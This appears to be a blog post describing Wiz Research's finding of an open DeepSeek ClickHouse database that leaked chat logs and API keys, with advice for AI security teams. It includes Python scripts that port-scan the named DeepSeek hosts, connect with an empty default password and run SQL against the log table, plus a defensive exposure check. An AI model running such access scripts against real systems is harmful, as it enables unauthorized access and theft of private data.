Wiz Research recently uncovered a significant security lapse at DeepSeek, a rising Chinese AI startup: a publicly accessible ClickHouse database belonging to the company was exposing sensitive data. The incident highlights the critical need for robust security measures in the rapidly evolving field of artificial intelligence. This blog post delves into the details of the database exposure, its potential impact, and the broader implications for the AI industry.
The Wiz Research team, while assessing DeepSeek's external security posture, identified a publicly accessible ClickHouse database. The database, hosted at oauth2callback.deepseek.com:9000 and dev.deepseek.com:9000, was completely open and unauthenticated, allowing full control over database operations and access to internal data.
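To make "completely open" concrete: with no authentication configured, anyone on the internet could have connected as ClickHouse's built-in default user with an empty password and run queries. The sketch below illustrates this using the third-party clickhouse-driver package against the native protocol port named above; this is an illustration under those assumptions, not the tooling Wiz actually used.

```python
from clickhouse_driver import Client  # third-party package: pip install clickhouse-driver

# Hosts and port taken from the exposure described above; "default" with an empty
# password is effectively what an unauthenticated ClickHouse deployment accepts.
for host in ("oauth2callback.deepseek.com", "dev.deepseek.com"):
    try:
        client = Client(host=host, port=9000, user="default", password="")
        # A successful result here means full, unauthenticated query access.
        print(host, client.execute("SHOW DATABASES"))
    except Exception as exc:
        print(host, "not reachable or secured:", exc)
```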
The exposed database contained over a million lines of log streams holding highly sensitive information, including chat history, secret keys, backend details, and other operational metadata.
This sensitive information posed a significant risk to DeepSeek and its users. With no authentication in place, attackers could have retrieved plaintext chat histories and secrets, exfiltrated proprietary internal data, and potentially escalated privileges within DeepSeek's environment.
Wiz Research's reconnaissance began with mapping DeepSeek's external attack surface, identifying around 30 internet-facing subdomains. While most appeared harmless, two open ports (8123 and 9000) led the team to the exposed ClickHouse database.
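For context on what this kind of surface mapping can look like, here is a minimal Python sketch that checks a list of hostnames for the two ports in question. It is an illustration, not Wiz's actual tooling, and the subdomain list is a hypothetical stand-in for the roughly 30 hosts the team enumerated.

```python
import socket

# Hypothetical list standing in for the ~30 internet-facing DeepSeek subdomains.
SUBDOMAINS = ["oauth2callback.deepseek.com", "dev.deepseek.com"]
# 8123 = ClickHouse HTTP interface, 9000 = ClickHouse native TCP protocol.
PORTS = [8123, 9000]

def port_is_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """Attempt a plain TCP connection; success means the port is reachable from outside."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    for host in SUBDOMAINS:
        for port in PORTS:
            if port_is_open(host, port):
                print(f"[!] {host}:{port} is reachable from the internet")
```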
By leveraging ClickHouse’s HTTP interface and browsing to the /play path, the researchers were able to execute arbitrary SQL queries directly from the browser. This exposed a table named log_stream, containing extensive logs with sensitive data.
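The HTTP interface is what makes this kind of access trivial: ClickHouse accepts SQL through a simple query parameter, which is also what backs the /play page. The sketch below illustrates this under the assumption of an unauthenticated instance; the base URL is a placeholder, and the two statements (SHOW TABLES and a bounded SELECT on log_stream) are illustrative rather than the exact queries the researchers ran.

```python
import urllib.parse
import urllib.request

# Placeholder standing in for the exposed instance's HTTP interface (default port 8123).
BASE_URL = "http://dev.deepseek.com:8123/"

def run_query(sql: str, timeout: float = 10.0) -> str:
    """Send a SQL statement to ClickHouse's HTTP interface and return the raw text result."""
    url = BASE_URL + "?" + urllib.parse.urlencode({"query": sql})
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")

if __name__ == "__main__":
    # List the tables visible to the unauthenticated default user,
    # then peek at a handful of rows from the log table mentioned above.
    print(run_query("SHOW TABLES"))
    print(run_query("SELECT * FROM log_stream LIMIT 5"))
```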
The log_stream table contained revealing columns, including timestamps, references to internal DeepSeek API endpoints, plaintext log values holding chat history, API keys, and backend details, and fields identifying the service and source that generated each entry.
This incident underscores several critical points about AI security:
The exposure highlights the importance of securing the infrastructure and tools supporting AI applications. While much focus is on futuristic AI threats, fundamental security practices cannot be overlooked.
The rapid integration of AI into businesses necessitates a stronger focus on security practices. It is vital for organizations to recognize the risks associated with handling sensitive data and enforce security measures comparable to those required for cloud and infrastructure providers.
As organizations adopt AI tools, they entrust these companies with sensitive data. This makes it imperative for security teams to collaborate with AI engineers, ensuring visibility into the architecture, tooling, and models being used.
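One practical way to operationalize these practices is to turn "no data store answers anonymous queries from the internet" into an automated check that security teams can run continuously. The sketch below is one minimal way to do that for ClickHouse's HTTP interface; the hostname is hypothetical, and the check deliberately treats only a successful anonymous query as a failure, since exact error codes vary across ClickHouse versions and configurations.

```python
import urllib.error
import urllib.request

def rejects_anonymous_access(host: str, port: int = 8123, timeout: float = 5.0) -> bool:
    """Return True if an unauthenticated read-only query is refused or the port is unreachable."""
    url = f"http://{host}:{port}/?query=SELECT%201"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            # A 200 response with a result means anyone on the internet can run SQL here.
            return not (resp.status == 200 and resp.read().strip() == b"1")
    except urllib.error.HTTPError:
        # The server is up but refuses the anonymous query (e.g. an authentication error).
        return True
    except OSError:
        # Unreachable from the outside, which is also an acceptable outcome.
        return True

if __name__ == "__main__":
    for host in ["clickhouse.example-ai-startup.com"]:  # hypothetical host to audit
        print(host, "OK" if rejects_anonymous_access(host) else "EXPOSED: anonymous SQL accepted")
```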
The DeepSeek database exposure serves as a crucial reminder of the importance of security in the AI landscape. As AI becomes more deeply integrated into businesses globally, the industry must prioritize security practices. Addressing fundamental security risks and fostering collaboration between security teams and AI engineers will be essential to safeguard data and prevent future exposures.
To further explore the evolving AI landscape, consider reviewing The State of AI in the Cloud 2025 report to understand the broader context of AI adoption and its associated security challenges. To delve deeper into AI's unique security risks, see this Wiz Academy resource.